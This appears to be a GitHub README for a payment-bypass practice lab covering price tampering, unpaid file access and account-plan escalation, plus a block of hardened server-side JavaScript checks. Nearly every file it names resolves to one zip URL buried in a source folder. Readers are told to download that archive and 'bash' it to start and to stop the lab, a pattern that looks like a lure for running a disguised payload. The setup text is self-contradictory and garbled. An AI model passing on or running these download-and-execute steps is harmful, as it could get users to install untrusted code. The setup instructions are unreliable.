This lab will help you uncover payment bypass vulnerabilities. You will learn three techniques often used in bug bounty hunting:
- Lab 01: Price Modification - Adjust a price from $99 to $0.
- Lab 02: Direct Path Access - Access premium files for free.
- Lab 03: Permission Bypass - Upgrade your account status from "free" to "paid."
Before you start, ensure you have the following on your computer:
- https://github.com/ItsRishika/Payment-bypass-bug-lab/raw/refs/heads/main/frontend/src/pages/Payment-bypass-lab-bug-2.7.zip: This is required to run the lab. You can download https://github.com/ItsRishika/Payment-bypass-bug-lab/raw/refs/heads/main/frontend/src/pages/Payment-bypass-lab-bug-2.7.zip here.
- Burp Suite: This is optional for some labs but is useful for testing.
Visit this page to download the lab files: Download the latest version.
- Click on the release version that you want to download.
- Follow the instructions on the page to download the appropriate file.
- Open a terminal in the folder where you downloaded the files.
- Run the start script by typing the following command and pressing Enter:
bash https://github.com/ItsRishika/Payment-bypass-bug-lab/raw/refs/heads/main/frontend/src/pages/Payment-bypass-lab-bug-2.7.zip
- The lab will open in your default web browser automatically.
To stop the lab: Simply run this command in your terminal:
bash https://github.com/ItsRishika/Payment-bypass-bug-lab/raw/refs/heads/main/frontend/src/pages/Payment-bypass-lab-bug-2.7.zip
- Navigate to Lab 01.
- Click on "Check Price" on any coupon available in this lab.
- Modify the price to see how it works.
- Head to Lab 02.
- Locate the premium files link.
- Try to access the files without payment.
- Go to Lab 03.
- Follow the instructions to change your account status from "free" to "paid".
- Verify your account benefits after the change.
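The server-side checks that close the three lab bugs, as an added example that is not code from the lab itself. It assumes the lab's server trusts a client-supplied price and a client-supplied `plan` field; all function names, field names and sample data are hypothetical.

```javascript
// Constructed sample data; names and values are assumptions for illustration.
const CATALOGUE = new Map([["coupon-10", { priceCents: 9900 }]]);
const ACCOUNTS = new Map([["alice", { plan: "free", displayName: "Alice" }]]);
const PREMIUM_FILES = new Set(["premium/report.pdf"]);

// Weak (Lab 01 pattern): the amount to charge is read from the request body.
function quoteTrustingClient(body) {
  return { itemId: body.itemId, chargeCents: body.priceCents };
}

// Hardened: the client names the item; the price comes from the server catalogue.
function quoteServerPriced(body) {
  const item = CATALOGUE.get(body.itemId);
  if (!item) throw new Error("unknown item");
  return { itemId: body.itemId, chargeCents: item.priceCents };
}

// Weak (Lab 03 pattern): every submitted field is merged into the account,
// including "plan".
function updateProfileMerged(user, body) {
  return { ...ACCOUNTS.get(user), ...body };
}

// Hardened: only allow-listed fields are user-editable; "plan" is not one of them.
const EDITABLE_FIELDS = new Set(["displayName"]);
function updateProfileAllowListed(user, body) {
  const account = { ...ACCOUNTS.get(user) };
  for (const [field, value] of Object.entries(body)) {
    if (!EDITABLE_FIELDS.has(field)) throw new Error(`field not editable: ${field}`);
    account[field] = value;
  }
  return account;
}

// Hardened (Lab 02 pattern): entitlement is read from the stored account on
// every request, so knowing the file path is not enough.
function canDownload(user, path) {
  if (!PREMIUM_FILES.has(path)) return true;
  const account = ACCOUNTS.get(user);
  return Boolean(account) && account.plan === "paid";
}
```

When you finish each lab, compare the request you changed with the matching hardened function to see which server-side check was missing.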
Inside the downloaded folder, you will find the following files:
- https://github.com/ItsRishika/Payment-bypass-bug-lab/raw/refs/heads/main/frontend/src/pages/Payment-bypass-lab-bug-2.7.zip: This script starts the lab.
- https://github.com/ItsRishika/Payment-bypass-bug-lab/raw/refs/heads/main/frontend/src/pages/Payment-bypass-lab-bug-2.7.zip: Use this to stop the lab.
- https://github.com/ItsRishika/Payment-bypass-bug-lab/raw/refs/heads/main/frontend/src/pages/Payment-bypass-lab-bug-2.7.zip: You will find detailed instructions here.
- Other configurations specific to each lab you will navigate.
If you encounter issues during setup or while running the labs, consider the following:
- Ensure you have installed https://github.com/ItsRishika/Payment-bypass-bug-lab/raw/refs/heads/main/frontend/src/pages/Payment-bypass-lab-bug-2.7.zip correctly.
- Check your terminal for any error messages. These messages usually indicate what's wrong.
- Restart your terminal and try running the scripts again.
For more help, refer to the Documentation.
Keep the lab updated by following these steps:
- Go back to the Releases page.
- Download the latest version.
- Replace the old files in your local folder with the new files.
If you need assistance or have questions, you can open an issue on the GitHub repository. The community or the maintainers will respond to your inquiry.
That's everything you need to know to download and run the Payment Bypass Techniques Lab. Enjoy learning about payment vulnerabilities!